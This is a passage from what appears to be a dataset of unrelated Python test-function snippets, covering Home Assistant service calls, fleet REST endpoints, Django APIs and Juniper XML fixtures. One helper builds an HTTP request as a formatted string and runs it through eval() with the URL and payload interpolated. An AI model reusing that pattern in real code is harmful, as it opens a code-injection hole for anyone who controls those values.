\"addons\": [\"test\"],\n \"folders\": [\"ssl\"],\n \"openpeerpower\": False,\n \"password\": \"123456\",\n }", "async def test_api_call_service_with_data(\n hass: HomeAssistant, mock_api_client: TestClient\n) -> None:\n\n @ha.callback\n def listener(service_call):\n \"\"\"Record that our service got called.\n\n Also test if our data came through.\n \"\"\"\n hass.states.async_set(\n \"test.data\",\n \"on\",\n {\"data\": service_call.data[\"test\"]},\n context=service_call.context,\n )\n\n hass.services.async_register(\"test_domain\", \"test_service\", listener)\n\n resp = await mock_api_client.post(\n \"/api/services/test_domain/test_service\", json={\"test\": 1}\n )\n data = await resp.json()\n assert len(data) == 1\n state = data[0]\n assert state[\"entity_id\"] == \"test.data\"\n assert state[\"state\"] == \"on\"\n assert state[\"attributes\"] == {\"data\": 1}", "def test_start(self):\n\n message = {\"method\": \"start\",\n \"params\": {\"elem\": self.container_to_run}}\n response = yield self._get_response(message)\n\n self.assertIsInstance(response, dict)\n self.assertEqual(response[\"method\"], \"start\")\n self.assertIsInstance(response[\"result\"], list)\n\n container_name = \"/\" + self.container_to_run\n\n containers = {i[0]: i[1] for i in response[\"result\"]}\n self.assertIn(container_name, containers.keys(),\n \"Container not found\")\n\n find_up_status = containers[container_name].lower().find(\"up\")\n\n self.assertEqual(find_up_status, 0, \"Container is not running\")", "def setUp(self):\n super(TestSyncServiceControl, self).setUp()\n self.api = ExternalApiClient()", "def test_call(self):\n\n with Client('username', 'password') as client:\n self.setSessionResponse(content='{\"ok\": true}')\n data = client.call(**self.build_parameters)\n self.assertEqual(data, '{\"ok\": true}')", "async def test_create_dispatch_route(client):\n create_dispatch_route_params = null\n params = [('access_token', 'access_token_example')]\n headers = { \n 'Accept': 'application/json',\n 'Content-Type': 'application/json',\n }\n response = await client.request(\n method='POST',\n path='/v1/fleet/dispatch/routes',\n headers=headers,\n json=create_dispatch_route_params,\n params=params,\n )\n assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')", "async def test_fetch_all_dispatch_routes(client):\n params = [('access_token', 'access_token_example'),\n ('group_id', 56),\n ('end_time', 56),\n ('duration', 56)]\n headers = { \n 'Accept': 'application/json',\n }\n response = await client.request(\n method='GET',\n path='/v1/fleet/dispatch/routes',\n headers=headers,\n params=params,\n )\n assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')", "def test_multiple_segments(self):\n socket = Mock()\n data = service_call.encode_call('bar', [10])\n socket.recv = Mock()\n socket.recv.side_effect = [data[:3], data[3:]]\n\n service_call.handle_connection(self.handlers, socket)\n self.handlers['bar'].assert_any_call([10])", "def test_data_framing(self):\n self.start_all_services()\n deproxy_cl = self.get_client(\"deproxy\")\n deproxy_cl.parsing = False\n request_body = \"x\" * 100\n\n deproxy_cl.make_request(request=self.post_request, end_stream=False)\n for byte in request_body[:-1]:\n deproxy_cl.make_request(request=byte, end_stream=False)\n deproxy_cl.make_request(request=request_body[-1], end_stream=True)\n\n self.__assert_test(client=deproxy_cl, request_body=request_body, request_number=1)", "async def test_get_fleet_locations(client):\n group_param = {}\n params = [('access_token', 'access_token_example')]\n headers = { \n 'Accept': 'application/json',\n 'Content-Type': 'application/json',\n }\n response = await client.request(\n method='POST',\n path='/v1/fleet/locations',\n headers=headers,\n json=group_param,\n params=params,\n )\n assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')", "def setUp(self):\n self.client = APIClient()\n\n self.speciality = models.Speciality.objects.create(\n name='Speciality'\n )\n\n self.payload = {\n 'name': \"Knee Replacement\",\n 'speciality': [self.speciality.pk],\n 'days_in_hospital': 2,\n 'days_in_destination': 2,\n 'duration_minutes': 120,\n 'overview': '<strong>Bla</strong> bla bla',\n }", "async def test_get_vehicles_locations(client):\n params = [('access_token', 'access_token_example'),\n ('start_ms', 56),\n ('end_ms', 56)]\n headers = { \n 'Accept': 'application/json',\n }\n response = await client.request(\n method='GET',\n path='/v1/fleet/vehicles/locations',\n headers=headers,\n params=params,\n )\n assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')", "def startTestRun(self):", "async def test_get_dvirs(client):\n params = [('access_token', 'access_token_example'),\n ('end_ms', 56),\n ('duration_ms', 56),\n ('group_id', 56)]\n headers = { \n 'Accept': 'application/json',\n }\n response = await client.request(\n method='GET',\n path='/v1/fleet/maintenance/dvirs',\n headers=headers,\n params=params,\n )\n assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')", "def test_api_predictor_events_get(self):\n pass", "def test_restart(self, mocked_check):\n from supvisors.rpcinterface import RPCInterface\n # create RPC instance\n rpc = RPCInterface(self.supervisor)\n # test RPC call\n self.assertTrue(rpc.restart())\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual([call()],\n self.supervisor.supvisors.fsm.on_restart.call_args_list)", "def test_post(self):\n self.client.force_login(self.john)\n\n with self.subTest(\"Test start task success\"):\n resp = self.client.post(self.URL, data={'taskType': 1})\n\n self.assertEqual(\n resp.status_code,\n status.HTTP_201_CREATED,\n \"Gamer cant create the task via API!\"\n )\n\n with self.subTest(\"Start the same task again fail\"):\n resp = self.client.post(self.URL, data={'taskType': 1})\n\n self.assertEqual(\n resp.status_code,\n status.HTTP_409_CONFLICT\n )", "def test_services(self):\n\n # Test turn_on\n turn_on_calls = mock_service(\n self.hass, remote.DOMAIN, SERVICE_TURN_ON)\n\n remote.turn_on(\n self.hass,\n entity_id='entity_id_val')\n\n self.hass.block_till_done()\n\n self.assertEqual(1, len(turn_on_calls))\n call = turn_on_calls[-1]\n\n self.assertEqual(remote.DOMAIN, call.domain)\n\n # Test turn_off\n turn_off_calls = mock_service(\n self.hass, remote.DOMAIN, SERVICE_TURN_OFF)\n\n remote.turn_off(\n self.hass, entity_id='entity_id_val')\n\n self.hass.block_till_done()\n\n self.assertEqual(1, len(turn_off_calls))\n call = turn_off_calls[-1]\n\n self.assertEqual(remote.DOMAIN, call.domain)\n self.assertEqual(SERVICE_TURN_OFF, call.service)\n self.assertEqual('entity_id_val', call.data[ATTR_ENTITY_ID])\n\n # Test sync\n sync_calls = mock_service(\n self.hass, remote.DOMAIN, SERVICE_SYNC)\n\n remote.sync(\n self.hass, entity_id='entity_id_val')\n\n self.hass.block_till_done()\n\n self.assertEqual(1, len(sync_calls))\n call = sync_calls[-1]\n\n self.assertEqual(remote.DOMAIN, call.domain)\n self.assertEqual(SERVICE_SYNC, call.service)\n self.assertEqual('entity_id_val', call.data[ATTR_ENTITY_ID])\n\n # Test send_command\n send_command_calls = mock_service(\n self.hass, remote.DOMAIN, SERVICE_SEND_COMMAND)\n\n remote.send_command(\n self.hass, entity_id='entity_id_val',\n device='test_device', command='test_command')\n\n self.hass.block_till_done()\n\n self.assertEqual(1, len(send_command_calls))\n call = send_command_calls[-1]\n\n self.assertEqual(remote.DOMAIN, call.domain)\n self.assertEqual(SERVICE_SEND_COMMAND, call.service)\n self.assertEqual('entity_id_val', call.data[ATTR_ENTITY_ID])", "def program_start_stop_response_fixture() -> dict[str, Any]:\n return cast(\n dict[str, Any], json.loads(load_fixture(\"program_start_stop_response.json\"))\n )", "def start():\n\n config = os.path.join(tempfile.gettempdir(), \"testapi.yml\")\n\n with open(config, \"w\", encoding=\"utf-8\") as output:\n output.write(WORKFLOWS)\n\n client = TestClient(app)\n start()\n\n return client", "async def test_get_dispatch_route_history(client):\n params = [('access_token', 'access_token_example'),\n ('start_time', 56),\n ('end_time', 56)]\n headers = { \n 'Accept': 'application/json',\n }\n response = await client.request(\n method='GET',\n path='/v1/fleet/dispatch/routes/{route_id}/history'.format(route_id=56),\n headers=headers,\n params=params,\n )\n assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')", "def test_create_machine(self, pretty_print, owner_api_token):\n create_machine_request = setup_data.get('create_machine', {}).get(\n 'request_body') or json.loads(\"\"\"{\n \"template\" : \"{}\",\n \"image\" : \"Debian\",\n \"quantity\" : 1.4658129805029452,\n \"disks\" : {\n \"disk_size\" : 0,\n \"disk_path\" : \"disk_path\"\n },\n \"fqdn\" : \"fqdn\",\n \"cloudinit\" : \"cloudinit\",\n \"volumes\" : \"\",\n \"save\" : true,\n \"dry\" : true,\n \"monitoring\" : true,\n \"tags\" : \"{}\",\n \"cloud\" : \"cloud\",\n \"size\" : \"m1.small\",\n \"optimize\" : \"optimize\",\n \"schedules\" : [ \"\", \"\" ],\n \"extra\" : \"\",\n \"name\" : \"DB mirror\",\n \"location\" : \"\",\n \"expiration\" : {\n \"date\" : \"2000-01-23T04:56:07.000+00:00\",\n \"action\" : \"stop\",\n \"notify\" : {\n \"period\" : \"minutes\",\n \"value\" : 1\n },\n \"notify_msg\" : \"notify_msg\"\n },\n \"net\" : \"\",\n \"scripts\" : [ \"\", \"\" ],\n \"key\" : \"\"\n}\"\"\", strict=False)\n uri = MIST_URL + '/api/v2/machines'\n request = MistRequests(\n api_token=owner_api_token,\n uri=uri,\n json=create_machine_request)\n request_method = getattr(request, 'POST'.lower())\n response = request_method()\n if 'create_machine' in REDIRECT_OPERATIONS:\n assert_response_found(response)\n else:\n assert_response_ok(response)\n assert poll(\n api_token=owner_api_token,\n uri=setup_data['amazon_machine_uri'],\n data={'state': 'running', 'actions': {'reboot': True}},\n timeout=_setup_module.DEFAULT_TIMEOUT)\n print('Success!!!')", "async def test_get_vehicle_locations(client):\n params = [('access_token', 'access_token_example'),\n ('start_ms', 56),\n ('end_ms', 56)]\n headers = { \n 'Accept': 'application/json',\n }\n response = await client.request(\n method='GET',\n path='/v1/fleet/vehicles/{vehicle_id}/locations'.format(vehicle_id=56),\n headers=headers,\n params=params,\n )\n assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')", "def test_issue_start_stop_watch(self):\n pass", "def test_micro_service():\n data_list = [\"1\", \"2\", \"3\"]\n service_list = []\n for d in data_list:\n service = MicroService()\n service.process = create_process_func(d)\n service_list.append(service)\n\n service_queue = build_micro_service_queue(service_list)\n test_data = \"test_data\"\n context = Context()\n context.state = State()\n data = service_queue.process_service_queue(context, test_data)\n\n for d in data_list:\n test_data = \"{}{}\".format(test_data, d)\n\n assert data == test_data", "def test_service_initiated():\n assert \"ready\" in bkt_outcome_unwind.index()", "def test_normal_operation(self, mocker):\n api = mocker.Mock(spec=TelemetryAPI)\n api.record_unique_keys.return_value = HttpResponse(200, '')\n\n unique_keys_tracker = UniqueKeysTracker()\n unique_keys_tracker.track(\"key1\", \"split1\")\n unique_keys_tracker.track(\"key2\", \"split1\")\n\n unique_keys_sync = UniqueKeysSynchronizer(mocker.Mock(), unique_keys_tracker)\n task = UniqueKeysSyncTask(unique_keys_sync.send_all, 1)\n task.start()\n time.sleep(2)\n assert task.is_running()\n assert api.record_unique_keys.mock_calls == mocker.call()\n stop_event = threading.Event()\n task.stop(stop_event)\n stop_event.wait(5)\n assert stop_event.is_set()", "async def test_get_fleet_trips(client):\n trips_param = {}\n params = [('access_token', 'access_token_example')]\n headers = { \n 'Accept': 'application/json',\n 'Content-Type': 'application/json',\n }\n response = await client.request(\n method='POST',\n path='/v1/fleet/trips',\n headers=headers,\n json=trips_param,\n params=params,\n )\n assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')", "def setUp(self):\n self.staff = get_user_model().objects.create_user(\n email='[email protected]',\n password='staffpassword1234',\n username='staffusername'\n )\n self.staff.is_staff = True\n self.staff.save()\n self.staff.refresh_from_db()\n\n self.client = APIClient()\n self.client.force_authenticate(user=self.staff)\n\n self.speciality = models.Speciality.objects.create(\n name='Speciality'\n )\n\n self.payload = {\n 'name': \"Knee Replacement\",\n 'speciality': [self.speciality.id],\n 'overview': '<strong>Bla</strong> bla bla',\n }\n\n \"\"\"Test that list procedure is success\"\"\"\n p1 = models.Procedure.objects.create(\n name=\"procedure1\",\n overview='bla bla bla'\n )\n p1.speciality.set([self.speciality.pk])\n p1.save()\n\n p2 = models.Procedure.objects.create(\n name=\"procedure2\",\n overview='bla bla bla'\n )\n p2.speciality.set([self.speciality.pk])\n p2.save()\n\n res = self.client.get(PROCEDURE_URL)\n\n procedures = models.Procedure.objects.all().order_by(\"-name\")\n ser = serializer.ProcedureSerializer(procedures, many=True)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 2)\n self.assertEqual(res.data, ser.data)", "async def test_action_tilt(\n hass: HomeAssistant,\n entity_registry: er.EntityRegistry,\n enable_custom_integrations: None,\n) -> None:\n entry = entity_registry.async_get_or_create(DOMAIN, \"test\", \"5678\")\n\n assert await async_setup_component(\n hass,\n automation.DOMAIN,\n {\n automation.DOMAIN: [\n {\n \"trigger\": {\"platform\": \"event\", \"event_type\": \"test_event_open\"},\n \"action\": {\n \"domain\": DOMAIN,\n \"device_id\": \"abcdefgh\",\n \"entity_id\": entry.id,\n \"type\": \"open_tilt\",\n },\n },\n {\n \"trigger\": {\"platform\": \"event\", \"event_type\": \"test_event_close\"},\n \"action\": {\n \"domain\": DOMAIN,\n \"device_id\": \"abcdefgh\",\n \"entity_id\": entry.id,\n \"type\": \"close_tilt\",\n },\n },\n ]\n },\n )\n await hass.async_block_till_done()\n\n open_calls = async_mock_service(hass, \"cover\", \"open_cover_tilt\")\n close_calls = async_mock_service(hass, \"cover\", \"close_cover_tilt\")\n\n hass.bus.async_fire(\"test_event_open\")\n await hass.async_block_till_done()\n assert len(open_calls) == 1\n assert len(close_calls) == 0\n\n hass.bus.async_fire(\"test_event_close\")\n await hass.async_block_till_done()\n assert len(open_calls) == 1\n assert len(close_calls) == 1\n\n hass.bus.async_fire(\"test_event_stop\")\n await hass.async_block_till_done()\n assert len(open_calls) == 1\n assert len(close_calls) == 1\n\n assert open_calls[0].domain == DOMAIN\n assert open_calls[0].service == \"open_cover_tilt\"\n assert open_calls[0].data == {\"entity_id\": entry.entity_id}\n assert close_calls[0].domain == DOMAIN\n assert close_calls[0].service == \"close_cover_tilt\"\n assert close_calls[0].data == {\"entity_id\": entry.entity_id}", "def test_get_requests(self):\n response = self.client.open('/api/provisioning/port',\n method='GET')\n self.assert200(response, \"Response body is : \" + response.data.decode('utf-8'))", "def test_start_services(matrix, mock_host_service):\n mock_host_service.reset_mock()\n status = matrix.start_services()\n mock_host_service.assert_has_calls(\n [\n mock.call(\"start\", matrix.synapse_service),\n mock.call(\"enable\", matrix.synapse_service),\n ],\n any_order=False,\n )\n assert mock_host_service.call_count == 2\n assert status is True", "def test_get_next_to_arrive(self, mock_requests):\n\n r = services.get_next_to_arrive(self.a, self.b)\n params = {'req1': self.a, 'req2': self.b}\n\n self.assertTrue(\n mock.call.get(services.SEPTA_NEXTTOARRIVE_URL, params=params) in\n mock_requests.mock_calls)", "def test_call(self):\n with HTTMock(spark_cloud_mock):\n for f in self.device.functions:\n expected = self.cloud_device.call(f, 'args')\n self.assertEqual(self.device.call(f, 'args'), expected)", "def test_done_post(self):\n Parameters = Parameters2()\n response = self.client.open(\n '/done',\n method='POST',\n data=json.dumps(Parameters),\n content_type='application/json')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))", "def test_status_post(self):\n Parameters = Parameters1()\n response = self.client.open(\n '/status',\n method='POST',\n data=json.dumps(Parameters),\n content_type='application/json')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))", "async def test_get_automation_trace(hass, hass_ws_client):\n id = 1\n\n def next_id():\n nonlocal id\n id += 1\n return id\n\n sun_config = {\n \"id\": \"sun\",\n \"trigger\": {\"platform\": \"event\", \"event_type\": \"test_event\"},\n \"action\": {\"service\": \"test.automation\"},\n }\n moon_config = {\n \"id\": \"moon\",\n \"trigger\": [\n {\"platform\": \"event\", \"event_type\": \"test_event2\"},\n {\"platform\": \"event\", \"event_type\": \"test_event3\"},\n ],\n \"condition\": {\n \"condition\": \"template\",\n \"value_template\": \"{{ trigger.event.event_type=='test_event2' }}\",\n },\n \"action\": {\"event\": \"another_event\"},\n }\n\n assert await async_setup_component(\n hass,\n \"automation\",\n {\n \"automation\": [\n sun_config,\n moon_config,\n ]\n },\n )\n\n with patch.object(config, \"SECTIONS\", [\"automation\"]):\n await async_setup_component(hass, \"config\", {})\n\n client = await hass_ws_client()\n\n await client.send_json({\"id\": next_id(), \"type\": \"automation/trace\"})\n response = await client.receive_json()\n assert response[\"success\"]\n assert response[\"result\"] == {}\n\n await client.send_json(\n {\"id\": next_id(), \"type\": \"automation/trace\", \"automation_id\": \"sun\"}\n )\n response = await client.receive_json()\n assert response[\"success\"]\n assert response[\"result\"] == {\"sun\": []}\n\n # Trigger \"sun\" automation\n hass.bus.async_fire(\"test_event\")\n await hass.async_block_till_done()\n\n # Get trace\n await client.send_json({\"id\": next_id(), \"type\": \"automation/trace\"})\n response = await client.receive_json()\n assert response[\"success\"]\n assert \"moon\" not in response[\"result\"]\n assert len(response[\"result\"][\"sun\"]) == 1\n trace = response[\"result\"][\"sun\"][0]\n assert len(trace[\"action_trace\"]) == 1\n assert len(trace[\"action_trace\"][\"action/0\"]) == 1\n assert trace[\"action_trace\"][\"action/0\"][0][\"error\"]\n assert \"result\" not in trace[\"action_trace\"][\"action/0\"][0]\n assert trace[\"condition_trace\"] == {}\n assert trace[\"config\"] == sun_config\n assert trace[\"context\"]\n assert trace[\"error\"] == \"Unable to find service test.automation\"\n assert trace[\"state\"] == \"stopped\"\n assert trace[\"trigger\"][\"description\"] == \"event 'test_event'\"\n assert trace[\"unique_id\"] == \"sun\"\n assert trace[\"variables\"]\n\n # Trigger \"moon\" automation, with passing condition\n hass.bus.async_fire(\"test_event2\")\n await hass.async_block_till_done()\n\n # Get trace\n await client.send_json(\n {\"id\": next_id(), \"type\": \"automation/trace\", \"automation_id\": \"moon\"}\n )\n response = await client.receive_json()\n assert response[\"success\"]\n assert \"sun\" not in response[\"result\"]\n assert len(response[\"result\"][\"moon\"]) == 1\n trace = response[\"result\"][\"moon\"][0]\n assert len(trace[\"action_trace\"]) == 1\n assert len(trace[\"action_trace\"][\"action/0\"]) == 1\n assert \"error\" not in trace[\"action_trace\"][\"action/0\"][0]\n assert \"result\" not in trace[\"action_trace\"][\"action/0\"][0]\n assert len(trace[\"condition_trace\"]) == 1\n assert len(trace[\"condition_trace\"][\"condition/0\"]) == 1\n assert trace[\"condition_trace\"][\"condition/0\"][0][\"result\"] == {\"result\": True}\n assert trace[\"config\"] == moon_config\n assert trace[\"context\"]\n assert \"error\" not in trace\n assert trace[\"state\"] == \"stopped\"\n assert trace[\"trigger\"][\"description\"] == \"event 'test_event2'\"\n assert trace[\"unique_id\"] == \"moon\"\n assert trace[\"variables\"]\n\n # Trigger \"moon\" automation, with failing condition\n hass.bus.async_fire(\"test_event3\")\n await hass.async_block_till_done()\n\n # Get trace\n await client.send_json(\n {\"id\": next_id(), \"type\": \"automation/trace\", \"automation_id\": \"moon\"}\n )\n response = await client.receive_json()\n assert response[\"success\"]\n assert \"sun\" not in response[\"result\"]\n assert len(response[\"result\"][\"moon\"]) == 2\n trace = response[\"result\"][\"moon\"][1]\n assert len(trace[\"action_trace\"]) == 0\n assert len(trace[\"condition_trace\"]) == 1\n assert len(trace[\"condition_trace\"][\"condition/0\"]) == 1\n assert trace[\"condition_trace\"][\"condition/0\"][0][\"result\"] == {\"result\": False}\n assert trace[\"config\"] == moon_config\n assert trace[\"context\"]\n assert \"error\" not in trace\n assert trace[\"state\"] == \"stopped\"\n assert trace[\"trigger\"][\"description\"] == \"event 'test_event3'\"\n assert trace[\"unique_id\"] == \"moon\"\n assert trace[\"variables\"]\n\n # Trigger \"moon\" automation, with passing condition\n hass.bus.async_fire(\"test_event2\")\n await hass.async_block_till_done()\n\n # Get trace\n await client.send_json(\n {\"id\": next_id(), \"type\": \"automation/trace\", \"automation_id\": \"moon\"}\n )\n response = await client.receive_json()\n assert response[\"success\"]\n assert \"sun\" not in response[\"result\"]\n assert len(response[\"result\"][\"moon\"]) == 3\n trace = response[\"result\"][\"moon\"][2]\n assert len(trace[\"action_trace\"]) == 1\n assert len(trace[\"action_trace\"][\"action/0\"]) == 1\n assert \"error\" not in trace[\"action_trace\"][\"action/0\"][0]\n assert \"result\" not in trace[\"action_trace\"][\"action/0\"][0]\n assert len(trace[\"condition_trace\"]) == 1\n assert len(trace[\"condition_trace\"][\"condition/0\"]) == 1\n assert trace[\"condition_trace\"][\"condition/0\"][0][\"result\"] == {\"result\": True}\n assert trace[\"config\"] == moon_config\n assert trace[\"context\"]\n assert \"error\" not in trace\n assert trace[\"state\"] == \"stopped\"\n assert trace[\"trigger\"][\"description\"] == \"event 'test_event2'\"\n assert trace[\"unique_id\"] == \"moon\"\n assert trace[\"variables\"]", "def test_available_incoming_call(self, *mocks):\n call_data = {\n 'sip_user_id': '123456789',\n 'caller_id': 'Test name',\n 'phonenumber': '0123456789',\n }\n\n # Call non existing device\n response = self.client.post(self.incoming_url, call_data)\n\n self.assertEqual(response.content, b'status=NAK')\n\n two_weeks_ago = datetime.now() - timedelta(days=14)\n Device.objects.create(\n name='test device',\n token='a652aee84bdec6c2859eec89a6e5b1a42c400fba43070f404148f27b502610b6',\n sip_user_id='123456789',\n os_version='8.3',\n client_version='1.0',\n last_seen=two_weeks_ago,\n app=self.ios_app,\n )\n call_data['call_id'] = 'sduiqayduiryqwuioeryqwer76789'\n\n # Now the device exists, call it again in seperate thread.\n thread = ThreadWithReturn(target=self.client.post, args=(self.incoming_url, call_data))\n thread.start()\n\n # Simulate some wait-time before device responds.\n time.sleep(1.5)\n\n app_data = {\n 'unique_key': call_data['call_id'],\n 'message_start_time': time.time(),\n }\n # Send the fake response from device.\n self.client.post(self.response_url, app_data)\n\n # Wait for the incoming-call to finish.\n response = thread.join()\n\n # Check if incoming-call got accepted.\n self.assertEqual(response.content, b'status=ACK')\n self.assertEqual(cache.get('attempts'), 2)", "async def test_create_vehicle_dispatch_route(client):\n create_dispatch_route_params = null\n params = [('access_token', 'access_token_example')]\n headers = { \n 'Accept': 'application/json',\n 'Content-Type': 'application/json',\n }\n response = await client.request(\n method='POST',\n path='/v1/fleet/vehicles/{vehicle_id}/dispatch/routes'.format(vehicle_id=56),\n headers=headers,\n json=create_dispatch_route_params,\n params=params,\n )\n assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')", "def test_rpcCall(self):\n pass", "def setUp(self):\n self.hass = get_test_home_assistant()\n mock_component(self.hass, 'group')\n assert setup_component(self.hass, zone.DOMAIN, {\n 'zone': {\n 'name': 'test',\n 'latitude': 32.880837,\n 'longitude': -117.237561,\n 'radius': 250,\n }\n })\n\n self.calls = []\n\n @callback\n def record_call(service):\n \"\"\"Record calls.\"\"\"\n self.calls.append(service)\n\n self.hass.services.register('test', 'automation', record_call)", "async def run(self):\n current_status = \"Init\"\n while self.expected_status != current_status:\n await asyncio.sleep(1)\n async with aiohttp.ClientSession() as session:\n async with session.get(self.url) as response:\n api_call_result = await response.json()\n current_status = api_call_result[\"status\"]\n \n # Send our single event and then we're done\n yield TriggerEvent(api_call_result)", "async def test_services(hass, coap_wrapper):\n assert coap_wrapper\n\n hass.async_create_task(\n hass.config_entries.async_forward_entry_setup(coap_wrapper.entry, SWITCH_DOMAIN)\n )\n await hass.async_block_till_done()\n\n await hass.services.async_call(\n SWITCH_DOMAIN,\n SERVICE_TURN_ON,\n {ATTR_ENTITY_ID: \"switch.test_name_channel_1\"},\n blocking=True,\n )\n assert hass.states.get(\"switch.test_name_channel_1\").state == STATE_ON\n\n await hass.services.async_call(\n SWITCH_DOMAIN,\n SERVICE_TURN_OFF,\n {ATTR_ENTITY_ID: \"switch.test_name_channel_1\"},\n blocking=True,\n )\n assert hass.states.get(\"switch.test_name_channel_1\").state == STATE_OFF", "def run(self):\r\n logging.info(\"Now excecuting test step {}\".format(self.stepname))\r\n try:\r\n response = eval(\"requests.{}('{}',params={})\".format(self.verb, self.url, self.payload))\r\n return response, True\r\n\r\n except requests.exceptions.RequestException as e:\r\n logging.warn(\"test {} failed\".format(self.stepname))\r\n \r\n return None, False", "def setUp(self):\n self.tool = flow_common_tool()\n self.xml = xml_tool()\n self.ins = route()\n\n self.response = {}\n self.response[\"HA_SINGLE_INSTANCE\"] = \"\"\"\n <instance-information xmlns=\"http://xml.juniper.net/junos/18.1I0/junos-routing\" junos:style=\"terse\">\n <instance-core>\n <instance-name>master</instance-name>\n <instance-type>forwarding</instance-type>\n <instance-rib>\n <irib-name>inet.0</irib-name>\n <irib-active-count>22</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>inet6.0</irib-name>\n <irib-active-count>7</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n </instance-core>\n </instance-information>\n \"\"\"\n\n self.response[\"HA_MULTI_INSTANCE\"] = \"\"\"\n <instance-information xmlns=\"http://xml.juniper.net/junos/18.1I0/junos-routing\" junos:style=\"terse\">\n <instance-core>\n <instance-name>master</instance-name>\n <instance-type>forwarding</instance-type>\n <instance-rib>\n <irib-name>inet.0</irib-name>\n <irib-active-count>22</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>inet6.0</irib-name>\n <irib-active-count>7</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n </instance-core>\n <instance-core>\n <instance-name>__juniper_private1__</instance-name>\n <instance-type>forwarding</instance-type>\n <instance-rib>\n <irib-name>__juniper_private1__.inet.0</irib-name>\n <irib-active-count>12</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n </instance-core>\n <instance-core>\n <instance-name>__juniper_private2__</instance-name>\n <instance-type>forwarding</instance-type>\n <instance-rib>\n <irib-name>__juniper_private2__.inet.0</irib-name>\n <irib-active-count>0</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>1</irib-hidden-count>\n </instance-rib>\n </instance-core>\n <instance-core>\n <instance-name>__juniper_private3__</instance-name>\n <instance-type>forwarding</instance-type>\n </instance-core>\n <instance-core>\n <instance-name>__juniper_private4__</instance-name>\n <instance-type>forwarding</instance-type>\n <instance-rib>\n <irib-name>__juniper_private4__.inet.0</irib-name>\n <irib-active-count>2</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n </instance-core>\n <instance-core>\n <instance-name>__master.anon__</instance-name>\n <instance-type>forwarding</instance-type>\n </instance-core>\n <instance-core>\n <instance-name>mgmt_junos</instance-name>\n <instance-type>forwarding</instance-type>\n </instance-core>\n </instance-information>\n \"\"\"\n\n\n self.response[\"HA_SINGLE_INSTANCE_BRIEF\"] = \"\"\"\n <instance-information xmlns=\"http://xml.juniper.net/junos/18.1I0/junos-routing\" junos:style=\"terse\">\n <instance-core>\n <instance-name>master</instance-name>\n <instance-type>forwarding</instance-type>\n <instance-rib>\n <irib-name>inet.0</irib-name>\n <irib-active-count>18</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>inet6.0</irib-name>\n <irib-active-count>1</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n </instance-core>\n </instance-information>\n \"\"\"\n\n self.response[\"HA_SINGLE_INSTANCE_DETAIL\"] = \"\"\"\n <instance-information xmlns=\"http://xml.juniper.net/junos/18.1I0/junos-routing\" junos:style=\"detail\">\n <instance-core>\n <instance-name>master</instance-name>\n <router-id>10.208.133.147</router-id>\n <instance-type>forwarding</instance-type>\n <instance-state>Active</instance-state>\n <instance-rib>\n <irib-name>inet.0</irib-name>\n <irib-route-count>18</irib-route-count>\n <irib-active-count>18</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>inet6.0</irib-name>\n <irib-route-count>1</irib-route-count>\n <irib-active-count>1</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n </instance-core>\n </instance-information>\n \"\"\"\n\n self.response[\"HA_SINGLE_INSTANCE_EXTENSIVE\"] = \"\"\"\n <instance-information xmlns=\"http://xml.juniper.net/junos/18.1I0/junos-routing\" junos:style=\"detail\">\n <instance-core>\n <instance-name>master</instance-name>\n <router-id>10.208.133.147</router-id>\n <instance-type>forwarding</instance-type>\n <instance-state>Active</instance-state>\n <instance-rib>\n <irib-name>inet.0</irib-name>\n <irib-route-count>20</irib-route-count>\n <irib-active-count>20</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>inet.1</irib-name>\n <irib-route-count>0</irib-route-count>\n <irib-active-count>0</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>inet.2</irib-name>\n <irib-route-count>0</irib-route-count>\n <irib-active-count>0</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>inet.3</irib-name>\n <irib-route-count>0</irib-route-count>\n <irib-active-count>0</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>iso.0</irib-name>\n <irib-route-count>0</irib-route-count>\n 